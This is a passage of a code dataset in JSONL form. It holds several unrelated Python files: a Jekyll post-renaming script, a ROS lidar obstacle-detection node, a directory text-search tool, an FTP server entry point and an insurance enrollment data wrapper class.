None:\r\n\t\tprint(\"None\")\r\n\t\r\n\treturn\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\t# print(\"Получаю обновления\")\r\n\t\t\tcurrent_playing = update_status(current_playing)\r\n\t\t\ttime.sleep(8)\r\n\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116441515","text":"print('\\n\\nstarting!\\n')\n\nimport os\nimport sys\nimport fileinput\nimport re\n\n\ndef replaceAll(file,searchExps, adds):\n with open(file, \"r+\") as f:\n contents = f.read()\n for key in searchExps:\n if key in contents:\n #print(\"\\n\",contents)\n contents = contents.replace(key,searchExps[key])\n print(key,searchExps[key])\n f.seek(0)\n f.truncate()\n f.write(contents)\n f.close()\n\n with open(file, \"r+\") as f:\n contents = f.read()\n for key in adds:\n if key not in contents:\n match = re.search(adds[key]+\":.*\\\\n\", contents)\n add = key + \": \" + str(match.group(0).replace(adds[key]+\": \", \"\")) + \"---\"\n contents = contents.replace(\"\\n---\", add)\n print(\"added\", key)\n f.seek(0)\n f.truncate()\n f.write(contents)\n f.close()\n\nfor filename in os.listdir('/home/ubuntu/mr.hyde/_posts'):\n \"\"\"\n if \"PODCAST\" in filename:\n print(\"\\n\\n\"+filename)\n replaceAll('/home/ubuntu/mr.hyde/_posts/'+filename, {\n \"air_date\":\"published\",\n \"show_name\":\"provider_name\",\n \"short_url\": \"source\",\n \"show_website\": \"provider_url\"\n },\n {\"provider_display\":\"provider_name\"})\n \"\"\"\n\n print(\"\\n\\n\"+filename)\n replaceAll('/home/ubuntu/mr.hyde/_posts/'+filename, {\n \"published\":\"published\"\n },\n {})\n\n","sub_path":"articles/_posts/renaming_stuff.py","file_name":"renaming_stuff.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"253307465","text":"#!/usr/bin/env python\n#/***********-*****************************************************************\n# Frobit lidar obstacle node \n# Copyright (c) 2015-2017, Kjeld Jensen \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#****************************************************************************/\n\"\"\"\nLaserScan tutorial:\nhttp://wiki.ros.org/laser_pipeline/Tutorials/IntroductionToWorkingWithLaserScannerData\n\nRevision\n2015-09-17 KJ First version\n2017-09-21 KJ Implemented a better algorithm\n\"\"\"\n\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom msgs.msg import IntArrayStamped\nfrom obstacle_detect import obstacle_detect\nfrom math import pi\n\nnode_name = 'obstacle'\n\t\nclass ros_node():\n\tdef __init__(self):\n\t\tself.update_rate = 20 # [Hz]\n\t\tself.scans_skipped_cnt = 0\n\t\tself.first_scan = True\n\n\t\t# read parameters\n\t\tself.ahead_warn = rospy.get_param(\"~ahead_threshold_warning\", 3.0) # [m]\n\t\tself.lateral_warn = rospy.get_param(\"~lateral_threshold_warning\", 0.5) # [m]\n\t\tself.ahead_alarm = rospy.get_param(\"~ahead_threshold_alarm\", 1.5) # [m]\n\t\tself.lateral_alarm = rospy.get_param(\"~lateral_threshold_alarm\", 0.5) # [m]\n\t\tself.ang_res = rospy.get_param(\"~angular_resolution\", 1.0) * pi/180.0 # [rad]\n\t\tself.min_range = rospy.get_param(\"~minimum_range\", 0.05) # [m]\n\t\tself.scans_skip = rospy.get_param(\"~scans_skip\", 0) # [m]\n\n\t\t# initialize wall finding algorithm\n\t\tself.od = obstacle_detect(self.ahead_warn, self.lateral_warn, self.ahead_alarm, self.lateral_alarm, self.min_range)\n\n\t\t# get topic names\n\t\tscan_topic = rospy.get_param(\"~scan_sub\", \"/base_scan\")\n\t\tobstacle_topic = rospy.get_param(\"~obstacle_pub\", \"/fmKnowledge/obstacle\")\n\n\t\t# setup wall pose publish topic\n\t\tself.obstacle_msg = IntArrayStamped()\n\t\tself.obstacle_msg.data = [0,0]\n\t\tself.obstacle_pub = rospy.Publisher(obstacle_topic, IntArrayStamped, queue_size=1)\n\n\t\t# setup subscription topic callbacks\n\t\trospy.Subscriber(scan_topic, LaserScan, self.on_scan_topic)\n\n\t\t# sall updater function\n\t\tself.r = rospy.Rate(self.update_rate)\n\t\tself.updater()\n\n\tdef on_scan_topic(self, msg):\n\t\tif self.scans_skipped_cnt == self.scans_skip:\n\t\t\tif self.first_scan == True:\n\t\t\t\tself.first_scan = False\n\t\t\t\t#print msg.angle_min*180/pi, msg.angle_max*180/pi, msg.angle_increment*180/pi, msg.range_min, msg.range_max, len(msg.ranges)\n\n\t\t\t\tself.od.set_params(self.ang_res, len(msg.ranges))\n\t\t\tself.scans_skipped_cnt = 0\n\t\t\tself.obstacle_msg.data = self.od.new_scan(msg.ranges)\n\t\t\tself.publish_obstacle_message()\n\t\telse:\n\t\t\tself.scans_skipped_cnt += 1\n\n\tdef publish_obstacle_message(self):\n\t\tself.obstacle_msg.header.stamp = rospy.get_rostime()\n\t\tself.obstacle_pub.publish(self.obstacle_msg)\n\n\tdef updater(self):\n\t\twhile not rospy.is_shutdown():\n\t\t\tself.od.update()\n\t\t\tself.r.sleep()\n\n# main function. \nif __name__ == '__main__':\n # initialize the node and name it.\n rospy.init_node(node_name)\n\n # go to class functions that do all the heavy lifting. Do error checking.\n try:\n node_class = ros_node()\n except rospy.ROSInterruptException: pass\n\n\n","sub_path":"fmProcessors/object_detection/frobit_lidar/scripts/obstacle_detect_node.py","file_name":"obstacle_detect_node.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344912496","text":"import re\nimport os\nimport argparse\n\n\nclass ScoutCLI():\n def __init__(self):\n parser = argparse.ArgumentParser(\n description='Scout searches through a directory for any string of text you specify.') # noqa\n parser.add_argument(\n '-p',\n '--path',\n required=True,\n help='Where Scout will search for the string specified in each file.' # noqa\n )\n parser.add_argument(\n '-s',\n '--search',\n required=True,\n help='The string to search for in each file of a path.'\n )\n parser.parse_args(namespace=self)\n\n def run(self):\n Scout.run(\n path=self.path,\n search=self.search,\n )\n\n\nclass Scout():\n @classmethod\n def run(cls, path, search):\n \"\"\"Run script iterating over each file and directory\n \"\"\"\n print('\\n##################\\nGATEKEEPER - SCOUT\\n##################\\n')\n print('Gatekeeper Scout found the following for your search query:\\n')\n dirs_to_ignore = [\n 'node_modules',\n 'vendor',\n '.git',\n '__pycache__',\n 'build',\n 'dist'\n ]\n regex_pattern = re.compile(search)\n\n # Scout for the search query in all subdirectories of the one specified\n scout_files = []\n for root, dirs, files in os.walk(path, topdown=True):\n dirs[:] = [directory for directory in dirs if directory not in dirs_to_ignore] # noqa\n for file in files:\n filepath = os.path.join(root, file)\n\n # Open each file and print the findings\n with open(filepath, 'r') as single_file:\n for line_number, line in enumerate(single_file, 1):\n data = regex_pattern.findall(line)\n for search in data:\n message = f'File: {filepath}\\nSearch: {line.strip()}\\nLine: {line_number}\\n' # noqa\n scout_files.append(message)\n print(message)\n return scout_files\n\n\ndef main():\n ScoutCLI().run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gatekeeper/scout.py","file_name":"scout.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"651975578","text":"#coding:utf-8\n\nfrom optparse import OptionParser\nimport SocketServer\nfrom core.ftp_server import FTPHandler\nfrom conf import settings\n\n\nclass ArgvHandler(object):\n def __init__(self):\n # 读取输入参数\n self.parser = OptionParser()\n (options, args) = self.parser.parse_args()\n self.verify_args(options, args)\n\n def verify_args(self, options, args):\n if hasattr(self, args[0]):\n func = getattr(self, args[0])\n func()\n else:\n self.parser.print_help()\n\n def start(self):\n print(\"---start---\")\n sf = FTPHandler()\n sf.start()\n sf.monitor()\n # # 多线程\n # server = SocketServer.ThreadingTCPServer((settings.HOST, settings.PORT), FTPHandler)\n # # 监听\n # server.serve_forever()\n","sub_path":"MadFTPServer/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591456257","text":"import json\nimport decimal\nimport random\nfrom datetime import datetime\n\nimport flask\nimport re\nfrom dateutil.parser import parse as dateutil_parse\n\nfrom taa import app\nfrom taa.services.agents import AgentService\nfrom taa.services.products import ProductService\nfrom taa.services.products.riders import RiderService\nfrom taa.services.enrollments import EnrollmentApplication\n\nproduct_service = ProductService()\nagent_service = AgentService()\nrider_service = RiderService()\n\n\nclass EnrollmentDataWrap(object):\n def __init__(self, wizard_data, case, enrollment_record=None):\n self.data = wizard_data\n self.case = case\n\n # There are times we need the enrollment record (if it has already been created) to determine some aspect\n # of the enrollment, like which agent was the writing agent.\n self.enrollment_record = enrollment_record\n\n def __getitem__(self, item):\n \"\"\"Allow dict access to raw data\"\"\"\n return self.data[item]\n\n def __setitem__(self, item, val):\n self.data[item] = val\n\n def __contains__(self, item):\n return item in self.data\n\n def get(self, key, default=None):\n return self.data.get(key, default)\n\n def is_preview(self):\n return self.data.get('is_preview', False)\n\n def did_decline(self):\n return self.data.get('did_decline', False)\n\n def is_self_enroll(self):\n if self.data.get(\"is_third_party\"):\n return False\n\n # If wizard and not inperson, it is self-enroll.\n if self.data.get('method') == EnrollmentApplication.METHOD_SELF_EMAIL:\n return True\n\n return False\n\n def is_enrollment_type_agent_assisted(self):\n \"\"\"\n For checkbox on the top of the FPP form. For imports, pass data through, otherwise use self_enroll.\n \"\"\"\n if self.data.get('enrollment_type'):\n return self.data['enrollment_type'].lower() == 'a'\n\n return not self.is_self_enroll()\n\n def is_import(self):\n return bool(self.data.get(\"is_third_party\"))\n\n def get_session_type(self):\n if self.data.get(\"is_third_party\"):\n return 'thirdparty'\n elif self.data['method'] == EnrollmentApplication.METHOD_INPERSON:\n return 'inperson'\n else:\n return 'email'\n\n def get_id_type(self):\n if self.data['identityType']:\n return self.data['identityType']\n else:\n return 'email'\n\n def get_id_token(self):\n if self.data['identityToken']:\n return self.data['identityToken']\n else:\n return self.get_employee_email()\n\n def get_agent_signing_name(self):\n if self.data.get('is_third_party'):\n return self.data['agent_name']\n\n agent = self.get_signing_agent()\n if not agent:\n return '(No Agent)'\n\n return agent.signing_name if agent.signing_name else agent.name()\n\n def get_agent_code(self):\n if self.data.get('is_third_party'):\n return self.data['agent_code']\n\n agent = self.get_signing_agent()\n if not agent:\n return '(No Agent)'\n\n return agent.agent_code\n\n def get_signing_agent(self):\n if self.is_self_enroll():\n if self.case.self_enrollment_setup.enrolling_agent:\n return self.case.self_enrollment_setup.enrolling_agent\n elif self.case.owner_agent:\n return self.case.owner_agent\n else:\n # This is not good - the case should not be enrollable without\n # an owner agent.\n raise Exception('Tried to enroll a case without an '\n 'owner agent.')\n elif self.is_import():\n return self.case.owner_agent\n elif self.enrollment_record and self.enrollment_record.agent_id is not None:\n return agent_service.get(self.enrollment_record.agent_id)\n elif agent_service.get_logged_in_agent():\n return agent_service.get_logged_in_agent()\n elif self.data.get('agent_id'):\n return agent_service.get(self.data['agent_id'])\n else:\n # If the logged-in user is not an agent, default to case owner.\n return self.case.owner_agent\n\n def get_employer_name(self):\n return self.case.company_name\n\n def get_product_code(self):\n return self.get_product().get_base_product_code()\n\n def get_product(self):\n return product_service.get(self.get_product_id())\n\n def get_product_id(self):\n if 'product_data' in self.data:\n # For backwards compatibility with old data format.\n return self.data['product_data']['id']\n else:\n return self.data['product_id']\n\n def get_employee_name(self):\n return u'{} {}'.format(self.data['employee']['first'],\n self.data['employee']['last'])\n\n def get_employee_first(self):\n return self.data['employee']['first']\n\n def get_employee_last(self):\n return self.data['employee']['last']\n\n def get_employee_birthdate(self):\n return self.data['employee']['birthdate']\n\n def get_employee_ssn(self):\n return self.data['employee']['ssn']\n\n def get_employee_ssn_last_digits(self):\n if self.get_employee_ssn() and len(self.get_employee_ssn()) >= 4:\n return self.get_employee_ssn()[-4:]\n\n return ''\n\n def get_employee_street(self):\n address = self.data['employee']['address1']\n if self.data['employee']['address2']:\n address += ' {}'.format(self.data['employee']['address2'])\n return address\n\n def get_employee_city_state_zip(self):\n return \"{}, {} {}\".format(\n self.data['employee']['city'],\n self.data['employee']['state'],\n self.data['employee']['zip']\n )\n\n def get_spouse_name(self):\n return u'{} {}'.format(self.data['spouse']['first'],\n self.data['spouse']['last'])\n\n def get_spouse_ssn(self):\n return self.data['spouse']['ssn']\n\n def get_employee_email(self):\n email_to = self.data['employee']['email']\n if not email_to:\n # fallback email if none was entered - just need a unique address\n email_to = '{}@5StarEnroll.com'.format(self.random_email_id())\n\n return email_to\n\n invalid_email_chars = re.compile(r'[^a-zA-Z0-9!#$%&\\'*+\\/=?^_`{|}~\\.-]')\n\n def _sanitize_email_str(self, val):\n # Replace invalid characters with empty string\n return self.invalid_email_chars.sub('', val)\n\n def get_employee_email_parts(self):\n if '@' not in self.get_employee_email():\n return '', self.get_employee_email()\n else:\n return self.get_employee_email().split('@', 1)\n\n def random_email_id(self, token_length=10):\n chars = 'ABCDEF0123456789'\n return ''.join([random.choice(chars)\n for _ in range(token_length)])\n\n def get_employee_date_of_hire(self):\n try:\n # The identityToken is the date_of_hire on FPP products.\n return dateutil_parse(self.data['identityToken'])\n except Exception:\n return None\n\n def did_employee_select_coverage(self):\n return (self.data.get('employee_coverage') and (self.data['employee_coverage'].get('premium') or\n self.data['employee_coverage'].get('face_value')))\n\n def get_employee_coverage(self):\n coverage = self.data['employee_coverage']\n return self.format_coverage(coverage)\n\n def get_employee_coverage_tier(self):\n coverage = self.data.get('employee_coverage')\n if not coverage:\n return None\n return coverage.get('coverage_selection')\n\n def format_coverage(self, coverage):\n if 'face_value' in coverage:\n return format(coverage['face_value'], ',.0f')\n elif 'coverage_selection' in coverage:\n coverage_selection = coverage['coverage_selection']\n if coverage_selection == True:\n return 'Included'\n elif coverage_selection in ['EE', 'ES', 'EC', 'EF']:\n return 'Included'\n else:\n return coverage_selection\n else:\n raise ValueError(coverage)\n\n def get_formatted_employee_premium(self):\n return self.format_money(self.get_employee_premium())\n\n def get_employee_premium(self):\n return decimal.Decimal(self.data['employee_coverage']['premium'])\n\n def did_spouse_select_coverage(self):\n\n # Special case for static benefit\n if self.data.get('spouse_coverage') and self.get_product().is_static_benefit() and self.did_employee_select_coverage():\n return True\n\n elif self.get_product().is_simple_coverage():\n if not 'employee_coverage' in self.data:\n return False\n \n return self.get_product().is_applicant_covered(\n 'spouse',\n # This uses employee coverage to determine if spouse is included.\n self.data['employee_coverage']['coverage_selection'])\n\n return (self.data.get('spouse_coverage') and (self.data['spouse_coverage'].get('premium') or\n self.data['spouse_coverage'].get('face_value')))\n\n def get_spouse_coverage(self):\n return self.format_coverage(self.data['spouse_coverage'])\n\n def get_formatted_spouse_premium(self):\n return self.format_money(self.get_spouse_premium())\n\n def get_spouse_premium(self):\n if self.get_product().is_employee_premium_only():\n return decimal.Decimal('0.00')\n return decimal.Decimal(self.data['spouse_coverage']['premium'])\n\n def format_money(self, amount):\n return '%.2f' % amount\n\n def get_total_children_premium(self):\n if self.get_product().is_fpp():\n # Add up the child premium for each child if this is FPP\n return sum(decimal.Decimal(unicode(child_coverage.get('premium', '0.00')))\n for child_coverage in self.data[\"child_coverages\"])\n else:\n # Just use the first child premium, if any.\n if len(self.data[\"child_coverages\"]) > 0:\n child_coverage = self.data[\"child_coverages\"][0]\n return decimal.Decimal(unicode(child_coverage.get('premium', '0.00')))\n\n return decimal.Decimal('0.00')\n\n def get_total_modal_premium(self):\n total = decimal.Decimal('0.00')\n if self.did_employee_select_coverage():\n total += self.get_employee_premium()\n if self.did_spouse_select_coverage():\n total += self.get_spouse_premium()\n if self.get_total_children_premium() > 0.0:\n total += self.get_total_children_premium()\n\n return total\n\n def get_num_covered_children(self):\n return len(self.get_covered_children())\n\n def get_covered_children(self):\n covered_children, coverages = self.get_covered_children_with_coverages()\n return covered_children\n\n def get_child_coverage(self, child_num=0):\n return self.format_coverage(self.data['child_coverages'][child_num])\n \n def get_covered_children_with_coverages(self):\n covered_children = []\n coverages = []\n \n if not self.data.get('child_coverages'):\n return covered_children, coverages\n \n for i, child in enumerate(self.data['children']):\n coverage = self.data['child_coverages'][i]\n if self.is_child_coverage_valid(coverage):\n covered_children.append(child)\n coverages.append(coverage)\n \n return covered_children, coverages\n \n def is_child_coverage_valid(self, coverage):\n return (coverage and (coverage.get('face_value') or\n self.get_product().is_static_benefit() or\n (coverage.get('coverage_selection') and\n self.get_product().is_simple_coverage() and\n self.get_product().is_applicant_covered('children',\n coverage['coverage_selection']))))\n\n def get_absolute_child_index(self, covered_child_index):\n \n current_covered_index = 0\n \n for i, child in enumerate(self.data['children']):\n coverage = self.data['child_coverages'][i]\n if self.is_child_coverage_valid(coverage):\n # We found a covered child, this is either the one we were looking for, or we look for the next one.\n if current_covered_index == covered_child_index:\n return i\n else:\n current_covered_index += 1\n \n # Shouldn't get here.\n raise ValueError(\"Invalid covered child index\")\n \n def get_child_premium(self, child_num=0):\n if self.get_product().is_employee_premium_only():\n return decimal.Decimal('0.00')\n\n return decimal.Decimal(self.data['child_coverages'][child_num]['premium'])\n\n def get_formatted_child_premium(self, child_num=0):\n return self.format_money(self.get_child_premium(child_num))\n\n def get_employee_soh_questions(self):\n if 'soh_questions' in self.data['employee']:\n # Legacy format\n questions = self.data['employee']['soh_questions']\n else:\n questions = self.data['employee_soh_questions']\n\n # Filter out questions only intended for spouse\n return [q for q in questions if not q.get('is_spouse_only')]\n\n def get_spouse_soh_questions(self):\n if 'soh_questions' in self.data['spouse']:\n # Legacy format\n questions = self.data['spouse']['soh_questions']\n else:\n questions = self.data['spouse_soh_questions']\n\n # Filter out questions intended for employee only.\n return [q for q in questions if not q.get('is_employee_only')]\n\n def get_child_soh_questions(self, child_index):\n child = self.data['children'][child_index]\n if 'soh_questions' in child:\n # Backwards compat for legacy data format:\n questions = child['soh_questions']\n else:\n questions = self.data['children_soh_questions'][child_index]\n\n # Filter out emp and sp only questions\n return [q for q in questions if not q.get('is_employee_only') and not q.get('is_spouse_only')]\n \n def get_covered_child_soh_questions(self, child_index):\n # Same as above but interpret the index as an index into the covered_children only.\n abs_child_index = self.get_absolute_child_index(child_index)\n return self.get_child_soh_questions(abs_child_index)\n \n def get_employee_esignature(self):\n if self.should_use_call_center_workflow():\n # Replace employee signature with \"John Doe voice auth on file 02:45pm\"\n date = self.enrollment_record.signature_time\n esig = u\"{} voice auth on file {}\".format(self.get_employee_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return self.data.get('emp_sig_txt', esig)\n elif self.did_employee_sign_in_wizard():\n date = self.enrollment_record.signature_time\n esig = u\"{} esigned {}\".format(self.get_employee_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return self.data.get('emp_sig_txt', esig)\n else:\n return self.data.get('emp_sig_txt', '')\n\n def get_employee_esignature_date(self):\n date = self.enrollment_record.signature_time\n return self.data.get('emp_sig_date', date.strftime('%m/%d/%Y'))\n\n def get_employee_initials(self):\n return self.data.get('emp_initials_txt', '')\n\n def has_employee_esigned(self):\n return bool(self.get_employee_esignature())\n\n def get_agent_esignature(self):\n if self.should_use_call_center_workflow() or self.did_finish_signing_in_wizard():\n date = self.enrollment_record.signature_time\n esig = u'{} esigned {}'.format(self.get_agent_signing_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return self.data.get('agent_sig_txt', esig)\n elif self.enrollment_record.agent_signing_datetime:\n # Agent signed at some point later most likely\n date = self.enrollment_record.agent_signing_datetime\n esig = u'{} esigned {}'.format(self.get_agent_signing_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return esig\n else:\n return self.data.get('agent_sig_txt', '')\n\n def get_agent_esignature_date(self):\n if self.enrollment_record.agent_signing_datetime:\n date = self.enrollment_record.agent_signing_datetime\n else:\n date = self.enrollment_record.signature_time\n \n # If a date is provided in the enrollment data, it overrides the above date.\n return self.data.get('agent_sig_date', date.strftime('%m/%d/%Y'))\n\n def has_agent_esigned(self):\n return bool(self.get_agent_esignature())\n\n def get_agent_initials(self):\n return self.data.get('agent_initials_txt', '')\n\n def get_beneficiary_data(self):\n bene_data = {\n 'employee_primary': [],\n 'employee_contingent': [],\n 'spouse_primary': [],\n 'spouse_contingent': [],\n }\n\n # \"Shorthand\" beneficiary settings\n if self.data.get('employee_beneficiary', '') == 'spouse':\n bene_data['employee_primary'] += [\n self.get_beneficiary_family_member('spouse')\n ]\n if (self.data.get('spouse_beneficiary', '') == 'spouse' or\n self.data.get('spouse_beneficiary', '') == 'employee'):\n bene_data['spouse_primary'] += [\n self.get_beneficiary_family_member('employee')\n ]\n\n from taa.services.enrollments import EnrollmentRecordParser\n for num in range(1, EnrollmentRecordParser.MAX_BENEFICIARY_COUNT + 1):\n if self.data.get('employee_beneficiary{}_name'.format(num)):\n bene_data['employee_primary'] += [\n self.get_beneficiary_dict('employee_beneficiary{}'.format(num))\n ]\n if self.data.get('employee_contingent_beneficiary{}_name'.format(num)):\n bene_data['employee_contingent'] += [\n self.get_beneficiary_dict('employee_contingent_beneficiary{}'.format(num))\n ]\n if self.data.get('spouse_beneficiary{}_name'.format(num)):\n bene_data['spouse_primary'] += [\n self.get_beneficiary_dict('spouse_beneficiary{}'.format(num))\n ]\n if self.data.get('spouse_contingent_beneficiary{}_name'.format(num)):\n bene_data['spouse_contingent'] += [\n self.get_beneficiary_dict('spouse_contingent_beneficiary{}'.format(num))\n ]\n\n # Trim beneficiaries if needed, as the shorthand beneficiary logic may\n # allow too many primary benficiaries to be set\n bene_data['employee_primary'] = bene_data['employee_primary'][:EnrollmentRecordParser.MAX_BENEFICIARY_COUNT+1]\n bene_data['spouse_primary'] = bene_data['spouse_primary'][:EnrollmentRecordParser.MAX_BENEFICIARY_COUNT+1]\n\n return bene_data\n\n def get_beneficiary_family_member(self, prefix, relationship='spouse'):\n bd = self.data[prefix]['birthdate']\n\n bene_dict = dict(\n name='{} {}'.format(self.data[prefix]['first'],\n self.data[prefix]['last']),\n ssn=self.data[prefix]['ssn'],\n relationship=relationship,\n birthdate=bd,\n percentage=100,\n )\n\n return bene_dict\n\n def get_beneficiary_dict(self, prefix):\n bd = self.data['{}_dob'.format(prefix)]\n\n bene_dict = dict(\n name=self.data['{}_name'.format(prefix)],\n ssn=self.data['{}_ssn'.format(prefix)],\n relationship=self.data['{}_relationship'.format(prefix)],\n birthdate=bd,\n percentage=self.data['{}_percentage'.format(prefix)],\n )\n\n return bene_dict\n\n def has_multiple_beneficiaries(self):\n \"\"\"returns True if any of the beneficiaries are not at 100%\"\"\"\n bene_pattern = re.compile('_bene\\d+_percentage$')\n\n for key, value in self.data.iteritems():\n if bene_pattern.search(key) and value and value.isdigit() and int(value) < 100:\n return True\n\n return False\n\n def should_include_bank_draft(self):\n return self.case.include_bank_draft_form\n\n def should_use_call_center_workflow(self):\n return self.case.should_use_call_center_workflow\n\n def get_actively_at_work(self):\n product = self.get_product()\n # TODO: Possibly change the output value of this in the future\n if product.is_fpp() and product.is_guaranteed_issue() and self.case.omit_actively_at_work:\n return 'GI'\n else:\n if product.is_fpp() and self.case.omit_actively_at_work and not product.is_guaranteed_issue():\n return ''\n\n if 'is_employee_actively_at_work' in self.data:\n val = self.data['is_employee_actively_at_work']\n else:\n # Import format\n val = self.data['actively_at_work']\n\n return 'yes' if val else 'no'\n\n def get_third_party_enrollment_id(self):\n if self.data.get('third_party_enrollment_id'):\n return self.data['third_party_enrollment_id']\n else:\n return None\n\n def get_effective_date(self):\n if self.data.get('effective_date'):\n return dateutil_parse(self.data.get('effective_date'))\n \n # Look for effective date for this product on one of the coverage records (they should all have the same date).\n for coverage_record in self.get_coverage_records():\n if coverage_record.effective_date:\n return coverage_record.effective_date\n \n # Fall back to the signature time / application date.\n return self.enrollment_record.signature_time\n\n def get_coverage_records(self):\n \"Returns the coverage records associated with this product\"\n return filter(lambda r: r.product_id == self.get_product_id(), self.enrollment_record.coverages)\n \n def get_applicant_data(self):\n applicants = []\n\n effective_date = self.get_effective_date().strftime(\"%m/%d/%Y\")\n\n if self.enrollment_record.payment_mode:\n payment_mode = \"{}\".format(self.enrollment_record.payment_mode)\n else:\n payment_mode = \"{}\".format(self.case.payment_mode)\n \n if self.did_employee_select_coverage():\n coverage = self.get_employee_coverage()\n\n premium = self.get_formatted_employee_premium()\n premium_amount = self.get_employee_premium()\n applicant_effective_date = effective_date\n else:\n coverage = 'WAIVED'\n premium = ''\n premium_amount = decimal.Decimal('0.00')\n payment_mode = ''\n applicant_effective_date = ''\n\n # Employee data\n applicants.append(dict(\n relationship=\"self\",\n name=self.get_employee_first(),\n last_name=self.get_employee_last(),\n coverage=coverage,\n coverage_tier=self.get_employee_coverage_tier(),\n premium=premium_amount,\n formatted_premium=premium,\n mode=payment_mode,\n effective_date=applicant_effective_date,\n birthdate=self.get_employee_birthdate(),\n selected_riders=self.data.get('rider_data', {}).get('emp', []),\n ))\n\n if self.data.get('spouse') and self.data['spouse']['first']:\n if self.did_spouse_select_coverage():\n coverage = self.get_spouse_coverage()\n premium = self.get_formatted_spouse_premium()\n premium_amount = self.get_spouse_premium()\n applicant_payment_mode = payment_mode\n applicant_effective_date = effective_date\n else:\n coverage = 'WAIVED'\n premium = ''\n premium_amount = decimal.Decimal('0.00')\n applicant_payment_mode = ''\n applicant_effective_date = ''\n\n applicants.append(dict(\n relationship=\"spouse\",\n name=self.data['spouse']['first'],\n last_name=self.data['spouse']['last'],\n coverage=coverage,\n coverage_tier=None,\n premium=premium_amount,\n formatted_premium=premium,\n mode=applicant_payment_mode,\n effective_date=applicant_effective_date,\n birthdate=self.data['spouse']['birthdate'],\n selected_riders=self.data.get('rider_data', {}).get('sp', []),\n ))\n\n for i, child in enumerate(self.data['children']):\n is_covered = child in self.get_covered_children()\n\n if is_covered:\n premium = self.get_formatted_child_premium(i)\n premium_amount = self.get_child_premium(i)\n\n # If this is not the first child, and this is a product that groups child premiums, set it to zero.\n if i > 0 and self.get_product_code() == 'Group CI':\n premium = '0.00'\n premium_amount = decimal.Decimal('0.00')\n\n applicant_payment_mode = payment_mode\n applicant_effective_date = effective_date\n else:\n premium = ''\n premium_amount = decimal.Decimal('0.00')\n applicant_payment_mode = ''\n applicant_effective_date = ''\n\n applicants.append(dict(\n relationship=\"child\",\n name=child['first'],\n last_name=child['last'],\n coverage=self.get_child_coverage(i) if is_covered else 'WAIVED',\n coverage_tier=None,\n premium=premium_amount,\n formatted_premium=premium,\n mode=applicant_payment_mode,\n effective_date=applicant_effective_date,\n birthdate=child['birthdate'],\n selected_riders=[]\n ))\n\n return applicants\n\n def get_employee_coverage_data(self):\n for d in self.get_applicant_data():\n if d['relationship'] == 'self':\n return d\n \n def get_spouse_coverage_data(self):\n for d in self.get_applicant_data():\n if d['relationship'] == 'spouse':\n return d\n \n def get_child_coverage_data(self):\n return [d for d in self.get_applicant_data()\n if d['relationship'] == 'child'\n ]\n\n def get_selected_employee_riders(self):\n return self.data.get('rider_data', {}).get('emp', [])\n\n def get_selected_spouse_riders(self):\n return self.data.get('rider_data', {}).get('sp', [])\n\n def has_bank_draft_info(self):\n return self.get('bank_info', None) is not None\n\n def get_bank_draft_info(self):\n return self.get('bank_info')\n\n def requires_paylogix_export(self):\n return self.has_bank_draft_info() and self.get_product().requires_paylogix_export(self.enrollment_record)\n\n def get_account_holder_name(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('account_holder_name', '')\n\n def get_routing_number(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('routing_number', '')\n\n def get_account_number(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('account_number', '')\n\n def get_account_type(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('account_type', '')\n\n def get_account_type_shorthand(self):\n account_type = self.get_account_type()\n if account_type and account_type.lower() == 'checking':\n return 'C'\n if account_type and account_type.lower() == 'savings':\n return 'S'\n return account_type\n\n def get_city_state_zip(self):\n if not self.has_bank_draft_info():\n return\n bank_info = self.get_bank_draft_info()\n return bank_info.get('city_state_zip', '')\n\n def get_bank_name(self):\n if not self.has_bank_draft_info():\n return\n return 